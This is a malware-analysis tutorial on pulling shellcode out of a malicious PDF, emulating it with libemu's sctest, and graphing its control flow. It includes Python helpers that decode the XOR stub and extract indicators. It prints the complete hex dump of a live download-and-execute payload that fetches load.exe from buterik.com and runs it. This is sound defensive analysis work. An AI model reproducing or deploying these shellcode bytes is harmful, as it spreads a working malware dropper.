Libemu and extracting shellcodes from PDF malware

Apr 27, 2015

Using libemu to create malware flow graph

Muhammad Najmi Ahmad Zabidi ([email protected])∗

Abstract

This paper documents my own experience of extracting the shellcode from a malicious PDF and then rendering its control flow as a Graphviz picture. Most of the examples are adapted from the tutorial by [Jeremy, 2008].

1 Introduction

This write-up shows how to extract shellcode from a PDF file and analyse it with libemu.

2 PDF malware

A malicious PDF typically carries embedded JavaScript that the PDF reader executes when the document is opened. That script can perform harmful actions without the user's consent; in the sample below it holds the attacker's shellcode as an escaped string that is unpacked with unescape().

3 Steps to extract shellcodes

3.1 Tools of trade

Existing tools cover everything we need. Download the following:

• http://code.google.com/p/pyew/

• http://libemu.carnivore.it/

• http://www.graphviz.org/

3.2 Extracting the shellcode

I used pdf_example.py from the pyew package.

$ ls pdf_example.py -l
-rwxr-xr-x 1 najmi najmi 1497 2010-03-30 20:03 pdf_example.py

Given that I have a PDF malware fetched from the wild:

∗Thanks to my wife, for providing hot coffee!

$ avgscan bc66fd9e0c2f7a79167dab16531c28f2
AVG command line Anti-Virus scanner
Copyright (c) 2009 AVG Technologies CZ
Virus database version: 271.1.1/2834
Virus database release date: Sun, 25 Apr 2010 14:31:00 +08:00

bc66fd9e0c2f7a79167dab16531c28f2  Virus found Script/Exploit

Files scanned     :  1(1)
Infections found  :  1(1)
PUPs found        :  0
Files healed      :  0
Warnings reported :  0
Errors reported   :  0

Using pyew from Section 3.1, I manually located the obfuscated shellcode inside the PDF's JavaScript; it appears as the %u-escaped string shown in Figure 1:

Figure 1: PDF shellcodes in Pyew tool

Now let us look at the strings. Copy the string literal between the unescape() parentheses and save it to a text file (shell.txt in what follows).

Figure 2: PDF shellcodes (Zoom mode)

Now we need to turn the %u-escaped string back into raw bytes. Each %uXXYY token is one 16-bit little-endian code unit, so the low byte (YY) must be emitted before the high byte (XX); the following Perl one-liner does exactly that and writes the result to a new file:

$ perl -pe 's/%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' shell.txt > filtered-shell.txt

You should now have the raw shellcode. Notice that a plaintext URL is visible near its end, for example with hexdump (the final 0a byte is the newline that perl -pe carried over from shell.txt, not part of the shellcode):

$ hexdump -C filtered-shell.txt
00000000  90 90 90 90 90 90 eb 0f  5b 33 c9 66 b9 80 01 80  |........[3.f....|
00000010  33 11 43 e2 fa eb 05 e8  ec ff ff ff 81 75 b0 21  |3.C..........u.!|
00000020  11 11 11 9a 51 1d 9a 61  0d bc 9a 61 19 90 fd 11  |....Q..a...a....|
00000030  15 11 11 9a fd 47 79 9f  5f 1f fd f9 ef 11 11 11  |.....Gy._.......|
00000040  98 54 15 47 79 89 ef 9b  1f f9 e1 11 11 11 98 54  |.T.Gy..........T|
00000050  19 47 79 34 a1 ee d3 f9  f3 11 11 11 98 54 1d 47  |.Gy4.........T.G|
00000060  79 fe df f1 71 f9 c5 11  11 11 98 54 01 47 79 d0  |y...q......T.Gy.|
00000070  68 f4 a9 f9 d7 11 11 11  98 54 05 51 91 29 d2 64  |h........T.Q.).d|
00000080  eb 98 54 09 f8 16 10 11  11 4f 98 64 35 9a 54 15  |..T......O.d5.T.|
00000090  7b 10 48 9a 44 09 47 f9  9a 11 11 11 41 79 27 0b  |{.H.D.G.....Ay'.|
000000a0  3e 61 f9 86 11 11 11 98  54 0d 9a d4 92 d1 41 98  |>a......T.....A.|
000000b0  54 31 79 ee 11 11 11 41  9a 54 05 7b 13 48 9a 44  |T1y....A.T.{.H.D|
000000c0  09 f9 70 11 11 11 12 54  31 d6 11 4d 6f 3f 74 d6  |..p....T1..Mo?t.|
000000d0  51 15 69 74 11 11 ee 64  31 9a 54 1d 7b 10 48 9a  |Q.it...d1.T.{.H.|
000000e0  44 09 f9 51 11 11 11 7b  16 49 12 54 35 22 ca 42  |D..Q...{.I.T5".B|
000000f0  42 ee 64 31 41 42 9a 54  0d 7b 14 48 9a 44 09 f9  |B.d1AB.T.{.H.D..|
00000100  32 11 11 11 7b 11 ee 64  31 9a 54 19 7b 13 48 9a  |2...{..d1.T.{.H.|
00000110  44 09 f9 01 11 11 11 7b  ee 9a 54 01 7b 10 48 9a  |D......{..T.{.H.|
00000120  44 09 f9 11 11 11 11 50  4a 43 12 f0 12 f0 12 f0  |D......PJC......|
00000130  12 f0 92 fd 15 4b 42 9a  cb f3 e6 43 ee f1 44 9a  |.....KB....C..D.|
00000140  fd 9a 6c 19 9a 4c 1d 47  9a 62 2d 9a 65 0f 69 12  |..l..L.G.b-.e.i.|
00000150  e2 47 9a 67 31 12 e2 22  d8 58 50 bc 12 d2 47 22  |.G.g1..".XP...G"|
00000160  e7 1e af 01 2b e3 65 19  d0 df 1c 12 e3 51 fa e0  |....+.e......Q..|
00000170  2a ef 4f 64 f4 4b 9a fa  9a 4b 35 12 cc 77 9a 1d  |*.Od.K...K5..w..|
00000180  5a 9a 4b 0d 12 cc 9a 15  9a 12 d4 4f 4c d3 19 11  |Z.K........OL...|
00000190  f9 e5 ef ee ee 44 43 5d  5c 5e 5f 11 68 74 74 70  |.....DC]\^_.http|
000001a0  3a 2f 2f 62 75 74 65 72  69 6b 2e 63 6f 6d 2f 31  |://buterik.com/1|
000001b0  32 33 2f 6c 6f 61 64 2e  65 78 65 00 0a           |23/load.exe..|
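The %u conversion and the bytes in the dump can be checked without Perl or libemu. The following Python script is an added example, not part of the original paper and not code from pyew or libemu: it reimplements the %u decoding, then looks in the byte buffer for the decoder stub that is visible at offset 0x08 of the dump (pop ebx; xor ecx,ecx; mov cx,0x180; xor byte [ebx],0x11; inc ebx; loop), applies that XOR to the 0x180 bytes that follow the call at offset 0x17, and lists the printable strings before and after. The stub signature is an assumption taken from this one sample and will not match shellcode that uses a different decoder. The shellcode bytes are transcribed from the hexdump above (the trailing 0a is the newline from shell.txt).

```python
import re
import struct

# Shellcode bytes transcribed from the hexdump of filtered-shell.txt shown above.
# The final 0x0a is the newline from shell.txt, not part of the shellcode.
SHELLCODE_HEX = """
90 90 90 90 90 90 eb 0f 5b 33 c9 66 b9 80 01 80
33 11 43 e2 fa eb 05 e8 ec ff ff ff 81 75 b0 21
11 11 11 9a 51 1d 9a 61 0d bc 9a 61 19 90 fd 11
15 11 11 9a fd 47 79 9f 5f 1f fd f9 ef 11 11 11
98 54 15 47 79 89 ef 9b 1f f9 e1 11 11 11 98 54
19 47 79 34 a1 ee d3 f9 f3 11 11 11 98 54 1d 47
79 fe df f1 71 f9 c5 11 11 11 98 54 01 47 79 d0
68 f4 a9 f9 d7 11 11 11 98 54 05 51 91 29 d2 64
eb 98 54 09 f8 16 10 11 11 4f 98 64 35 9a 54 15
7b 10 48 9a 44 09 47 f9 9a 11 11 11 41 79 27 0b
3e 61 f9 86 11 11 11 98 54 0d 9a d4 92 d1 41 98
54 31 79 ee 11 11 11 41 9a 54 05 7b 13 48 9a 44
09 f9 70 11 11 11 12 54 31 d6 11 4d 6f 3f 74 d6
51 15 69 74 11 11 ee 64 31 9a 54 1d 7b 10 48 9a
44 09 f9 51 11 11 11 7b 16 49 12 54 35 22 ca 42
42 ee 64 31 41 42 9a 54 0d 7b 14 48 9a 44 09 f9
32 11 11 11 7b 11 ee 64 31 9a 54 19 7b 13 48 9a
44 09 f9 01 11 11 11 7b ee 9a 54 01 7b 10 48 9a
44 09 f9 11 11 11 11 50 4a 43 12 f0 12 f0 12 f0
12 f0 92 fd 15 4b 42 9a cb f3 e6 43 ee f1 44 9a
fd 9a 6c 19 9a 4c 1d 47 9a 62 2d 9a 65 0f 69 12
e2 47 9a 67 31 12 e2 22 d8 58 50 bc 12 d2 47 22
e7 1e af 01 2b e3 65 19 d0 df 1c 12 e3 51 fa e0
2a ef 4f 64 f4 4b 9a fa 9a 4b 35 12 cc 77 9a 1d
5a 9a 4b 0d 12 cc 9a 15 9a 12 d4 4f 4c d3 19 11
f9 e5 ef ee ee 44 43 5d 5c 5e 5f 11 68 74 74 70
3a 2f 2f 62 75 74 65 72 69 6b 2e 63 6f 6d 2f 31
32 33 2f 6c 6f 61 64 2e 65 78 65 00 0a
"""
SHELLCODE = bytes.fromhex(SHELLCODE_HEX)

_UNESCAPE_TOKEN = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def decode_unescape(s: str) -> bytes:
    """Equivalent of the page's Perl one-liner: each %uXXYY is a little-endian
    16-bit unit, so byte YY is emitted before XX. Plain %XX escapes, which the
    one-liner leaves untouched, are decoded as single bytes as well."""
    out = bytearray()
    for m in _UNESCAPE_TOKEN.finditer(s):
        if m.group(1) is not None:
            out += bytes.fromhex(m.group(1))[::-1]
        else:
            out.append(int(m.group(2), 16))
    return bytes(out)


# Decoder loop visible at offset 0x08 of the dump (assumed signature, from this sample):
#   5b              pop   ebx            ; ebx = return address pushed by the call below
#   33 c9           xor   ecx, ecx
#   66 b9 LL HH     mov   cx, LENGTH     ; number of bytes to decode
#   80 33 KK        xor   byte [ebx], KEY
#   43              inc   ebx
#   e2 fa           loop  <xor>
_XOR_STUB = re.compile(rb"\x5b\x33\xc9\x66\xb9(..)\x80\x33(.)\x43\xe2\xfa", re.DOTALL)


def find_xor_decoder(buf: bytes):
    """Return (key, length, payload_offset) or None. The payload starts right after
    the E8 call whose target is the stub, because 'pop ebx' takes that return address."""
    m = _XOR_STUB.search(buf)
    if m is None:
        return None
    length = struct.unpack("<H", m.group(1))[0]
    key = m.group(2)[0]
    stub = m.start()
    for off in range(len(buf) - 4):
        if buf[off] == 0xE8:
            rel = struct.unpack_from("<i", buf, off + 1)[0]
            if off + 5 + rel == stub:
                return key, length, off + 5
    return None


def decode_payload(buf: bytes) -> bytes:
    """Apply the stub's XOR to the encoded region, leaving the rest of the buffer as is."""
    info = find_xor_decoder(buf)
    if info is None:
        raise ValueError("no recognised xor decoder stub")
    key, length, start = info
    out = bytearray(buf)
    for i in range(start, min(start + length, len(buf))):
        out[i] ^= key
    return bytes(out)


def printable_strings(buf: bytes, min_len: int = 4):
    """strings(1)-style: runs of printable ASCII at least min_len long."""
    pat = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pat, buf)]


if __name__ == "__main__":
    key, length, start = find_xor_decoder(SHELLCODE)
    print(f"xor key 0x{key:02x}, {length:#x} bytes encoded from offset {start:#x}")
    decoded = decode_payload(SHELLCODE)
    print("decoded payload begins:", decoded[start:start + 7].hex())
    print("strings before:", printable_strings(SHELLCODE))
    print("strings after: ", printable_strings(decoded))
```

The decoded payload begins with 90 64 a1 30 00 00 00, that is nop; mov eax, fs:[0x30], the usual PEB lookup for finding kernel32. After decoding, the string "URLMON" appears at offset 0x195, which matches the lpFileName address 0x00417195 in the sctest trace below (libemu loads the buffer at 0x00417000). The URL at 0x19c sits just past the 0x180-byte encoded region (0x1c + 0x180 = 0x19c), which is why it is readable in the raw dump, and the call at offset 0x17 that enters the stub is the "success offset" that sctest reports.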

Now we call libemu's sctest tool. -S reads the shellcode from stdin, -g turns on getpc mode, in which libemu searches the buffer for the offset at which it starts executing as shellcode instead of assuming offset 0, -s 1000000 caps the number of emulated instructions, and -v prints the Win32 API calls the emulated shellcode makes:

$ sctest -Sgs 1000000 -v < filtered-shell.txt

It produces the following output. The "success offset" is where getpc mode started emulating, 0x17 here, which is the call instruction at the head of the decoder stub; the rest is the sequence of hooked API calls, with each pointer argument dereferenced to the string it points at:

verbose = 1
success offset = 0x00000017
Hook me Captain Cook!
userhooks.c:132 user_hook_ExitThread
ExitThread(-1)
stepcount 314316
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417195 =>
           = "URLMON";
) = 0x7df20000;
UINT GetSystemDirectory (
     LPTSTR lpBuffer = 0x0012fae8 =>
           = "c:\WINDOWS\system32";
     UINT uSize = 255;
) = 19;
ERROR DeleteFile (
     LPCTSTR lpFileName = 0x0012fae8 =>
           none;
) = -1;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
           none;
     LPCTSTR szURL = 0x0041719c =>
           = "http://buterik.com/123/load.exe";
     LPCTSTR szFileName = 0x0012fae8 =>
           = "c:\WINDOWS\system32\~.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x0012fae8 =>
           = "c:\WINDOWS\system32\~.exe";
     UINT uCmdShow = 0;
) = 32;
void ExitThread (
     DWORD dwExitCode = -1;
) = 0;

Read top to bottom, the trace is the whole infection chain of a classic download-and-execute shellcode: load urlmon.dll, resolve the system directory, delete any existing file at the drop path, download load.exe from buterik.com to c:\WINDOWS\system32\~.exe, run it with WinExec, and exit the thread. The addresses are libemu's: it maps the buffer at 0x00417000, so lpFileName 0x00417195 is offset 0x195 of filtered-shell.txt and szURL 0x0041719c is offset 0x19c, the plaintext URL already seen in the hexdump.

Now, if you want to create a flow graph, add the -G flag, followed by the output file name, to the same command:

$ sctest -Sgs 1000000 -v -G shell.dot < filtered-shell.txt

Next, render the dot file with the dot command from the Graphviz package:

$ dot shell.dot -Tpng -o shell.png

This creates a PNG file containing the flow graph of the shellcode as libemu emulated it.
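Once sctest has produced a trace like the one above, the part an analyst usually wants is the set of indicators in it: the library loaded, the download URL, the drop path and what was executed. The following Python script is an added example, not part of the paper and not code from libemu or pyew, that parses sctest's verbose output into a list of API calls and pulls those indicators out. The trace it runs on is the one printed above, re-typed as constructed test input; the line format it expects (TYPE Name (, an indented TYPE arg = value =>, = "string";, and ) = ret;) is taken from that trace, and the small table of APIs treated as "execution" is an assumption of the example.

```python
import re

# sctest -v trace from this page, re-typed as constructed test input for the parser.
SCTEST_TRACE = r"""verbose = 1
success offset = 0x00000017
Hook me Captain Cook!
userhooks.c:132 user_hook_ExitThread
ExitThread(-1)
stepcount 314316
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417195 =>
           = "URLMON";
) = 0x7df20000;
UINT GetSystemDirectory (
     LPTSTR lpBuffer = 0x0012fae8 =>
           = "c:\WINDOWS\system32";
     UINT uSize = 255;
) = 19;
ERROR DeleteFile (
     LPCTSTR lpFileName = 0x0012fae8 =>
           none;
) = -1;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
           none;
     LPCTSTR szURL = 0x0041719c =>
           = "http://buterik.com/123/load.exe";
     LPCTSTR szFileName = 0x0012fae8 =>
           = "c:\WINDOWS\system32\~.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x0012fae8 =>
           = "c:\WINDOWS\system32\~.exe";
     UINT uCmdShow = 0;
) = 32;
void ExitThread (
     DWORD dwExitCode = -1;
) = 0;
"""

# Line shapes assumed from the trace above.
_CALL_RE = re.compile(r"^(?P<rettype>[A-Za-z_][\w ]*?)\s+(?P<name>\w+)\s*\($")
_ARG_RE = re.compile(r"^\s+(?P<type>\w+)\s+(?P<arg>\w+)\s*=\s*(?P<val>[^;=\s]+)\s*(?P<ptr>=>)?\s*;?$")
_STR_RE = re.compile(r'^\s+=\s*"(?P<s>.*)"\s*;$')
_RET_RE = re.compile(r"^\)\s*=\s*(?P<ret>[^;]+?)\s*;$")


def success_offset(trace: str):
    """Offset at which libemu's getpc mode started emulating, or None."""
    m = re.search(r"^success offset = (0x[0-9a-fA-F]+)", trace, re.M)
    return int(m.group(1), 16) if m else None


def parse_sctest(trace: str):
    """Turn the verbose trace into a list of {name, rettype, args, ret} dicts.
    A pointer argument that sctest dereferenced is replaced by the string it
    points at; otherwise the raw value token (e.g. '0x0012fae8', '255') is kept."""
    calls, cur, last_arg = [], None, None
    for line in trace.splitlines():
        m = _CALL_RE.match(line)
        if m:
            cur = {"name": m.group("name"), "rettype": m.group("rettype"), "args": {}, "ret": None}
            last_arg = None
            continue
        if cur is None:
            continue  # preamble lines such as 'stepcount' or 'Hook me Captain Cook!'
        m = _ARG_RE.match(line)
        if m:
            last_arg = m.group("arg")
            cur["args"][last_arg] = m.group("val")
            continue
        m = _STR_RE.match(line)
        if m and last_arg is not None:
            cur["args"][last_arg] = m.group("s")
            continue
        m = _RET_RE.match(line)
        if m:
            cur["ret"] = m.group("ret")
            calls.append(cur)
            cur = None
    return calls


_URL_RE = re.compile(r"^[a-z]+://", re.I)
# APIs that run a file, and the argument naming what is run (assumed set).
_EXEC_APIS = {"WinExec": "lpCmdLine", "CreateProcessA": "lpCommandLine",
              "CreateProcessW": "lpCommandLine", "ShellExecuteA": "lpFile"}


def extract_indicators(calls):
    """Collect libraries, URLs, dropped files and executed commands from the calls."""
    ioc = {"libraries": [], "urls": [], "dropped_files": [], "executed": []}
    for call in calls:
        name, args = call["name"], call["args"]
        if name.startswith("LoadLibrary") and "lpFileName" in args:
            ioc["libraries"].append(args["lpFileName"])
        ioc["urls"] += [v for v in args.values() if _URL_RE.match(v)]
        if name.startswith("URLDownloadToFile") and "szFileName" in args:
            ioc["dropped_files"].append(args["szFileName"])
        if name in _EXEC_APIS and _EXEC_APIS[name] in args:
            ioc["executed"].append(args[_EXEC_APIS[name]])
    return ioc


if __name__ == "__main__":
    calls = parse_sctest(SCTEST_TRACE)
    print(f"success offset: {success_offset(SCTEST_TRACE):#x}")
    for c in calls:
        args = ", ".join(f"{k}={v!r}" for k, v in c["args"].items())
        print(f"{c['name']}({args}) = {c['ret']}")
    print(extract_indicators(calls))
```

For this trace the parser yields six calls (LoadLibraryA, GetSystemDirectory, DeleteFile, URLDownloadToFile, WinExec, ExitThread) and the indicators are the library URLMON, the URL http://buterik.com/123/load.exe, and c:\WINDOWS\system32\~.exe as both the dropped file and the executed command. Arguments that sctest could not dereference, such as DeleteFile's lpFileName, keep their raw pointer value, so a consumer can tell a recovered string from an unresolved address.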

References

[Jeremy, 2008] Jeremy (2008). http://www.sudosecure.net/archives/313.
